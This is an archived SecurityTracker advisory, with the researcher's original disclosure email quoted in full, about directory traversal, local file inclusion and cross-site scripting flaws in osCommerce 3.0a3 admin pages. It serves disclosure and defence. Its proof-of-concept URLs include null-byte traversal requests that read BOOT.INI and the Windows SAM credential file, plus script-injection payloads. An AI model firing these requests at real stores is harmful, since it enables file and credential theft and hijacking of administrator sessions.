SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   osCommerce Vendors:   osCommerce
osCommerce 'admin/templates_boxes_layout.php' Directory Traversal Bug Discloses Files to Remote Users
SecurityTracker Alert ID:  1017353
SecurityTracker URL:  http://securitytracker.com/id/1017353
CVE Reference:   CVE-2006-6533, CVE-2006-6534   (Links to External Site)
Updated:  May 22 2008
Original Entry Date:  Dec 7 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0a3
Description:   Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.

The 'admin/templates_boxes_layout.php' does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on target system.

Some demonstration exploit URLs are provided:

http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27

http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://[target]/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://[target]/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://[target]/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product

The original advisory is available at:

http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html

Impact:   A remote user can view files on the target system.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.oscommerce.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Oscommerce 3.0a3 traversal arbitrary file access

############################################
Oscommerce traversal arbitrary file access
Vendor:http://www.oscommerce.com/about/news,125
Advisore:http://lostmon.blogspot.com/2006/12
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
###########################################

osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.



####################
versions
####################

Oscommerce 3.0a3


###################
SOLUTION
###################

No solution was available at this time.


################
timeline
################

Discovered:11-11-2006
vendor notify:-----
vendor response:----
disclosure:07-12-2006

#################
Examples
#################

######################
traversal file access
######################

wen we try to open

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=[SOME WORD]&lID=27

the aplication returns a full path disclosure and
returns this error:

Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:\AppServ\www\
oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13

Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear')
in C:\AppServ\www\oscommerce\admin\templates\pages\templates_
boxes_layout.php on line 13

the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)

http://[victim]/admin/templates_boxes_layout.php?
set=boxes&filter=../../our_evil_php_file&lID=27

if we try to read a file outside webserver folder with a non php
extension can try for test this...

&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=boxes&filter=../../../../BOOT.INI%00&lID=27

http://localhost/oscommerce/admin/templates_boxes_layout.php?
set=content&filter=../../../../windows/repair/sam%00&lID=27

#####################
Cross site scripting
#####################

http://localhost/oscommerce/admin/modules.php?set=shipping
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost/definitiva/admin/customers.php?selected_box=customers
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/languages_definitions.php?lID=1
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E

http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product



Thnx to Estrella to be my ligth.

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
-- 
La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC